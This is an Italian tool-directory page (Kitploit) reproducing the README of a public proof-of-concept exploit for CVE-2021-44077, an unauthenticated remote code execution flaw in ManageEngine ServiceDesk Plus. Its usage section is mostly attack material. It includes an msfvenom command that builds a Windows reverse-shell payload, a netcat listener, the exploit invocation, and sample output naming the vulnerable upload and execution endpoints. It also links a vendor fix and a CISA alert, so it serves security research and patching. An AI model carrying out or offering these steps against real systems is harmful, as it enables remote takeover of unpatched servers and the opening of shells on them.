Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44077 — Exploit proof-of-concept per PreAuth RCE in ManageEngine ServiceDesk Plus (CVE-2021-44077). Carica ed esegue eseguibili Windows arbitrari su target vulnerabili. | Kitploit
Strumenti/GitHubGitHub/horizon3ai/cve-2021-44077
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

Exploit proof-of-concept per PreAuth RCE in ManageEngine ServiceDesk Plus (CVE-2021-44077). Carica ed esegue eseguibili Windows arbitrari su target vulnerabili.

Vedi Repository
36924 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44077

Proof of Concept Exploit per CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306

Basato su:

  • https://xz.aliyun.com/t/10631

Avviso CISA:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

Rimedio (Aggiornare alla build 11306 o successiva):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

Testato su ManageEngine ServiceDesk Plus Build 11303. Disattivato tutto l'AV.

Utilizzo

L'exploit carica un eseguibile Windows sul target e lo esegue.

Per sfruttare la vulnerabilità, genera prima un eseguibile qualsiasi. Ad esempio:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

Esegui pip install del file requirements oppure assicurati di avere il pacchetto requests.

Se stai cercando di ricevere una reverse shell, avvia prima il listener, ad esempio:

root@kitploit:~
nc -l 4444

Quindi esegui lo script dell'exploit, passando gli argomenti url e exe, ad esempio:

root@kitploit:~
python exploit.py http://<TARGET>:<PORT> <path_to_exe>

Esempio di output dello script:

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

Note sull'Exploit

  • La vulnerabilità permette di caricare qualsiasi file nella directory bin dell'installazione, inclusi file esistenti come script batch. Potrebbero esserci altri modi per invocare il file caricato.
  • Il caricamento diretto di una web shell sembra essere impedito da un filtro.

Dichiarazione di non responsabilità

Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non espressamente autorizzato. I manutentori del progetto non sono responsabili per un uso improprio del software. Utilizzare in modo responsabile.

Scarica lo strumento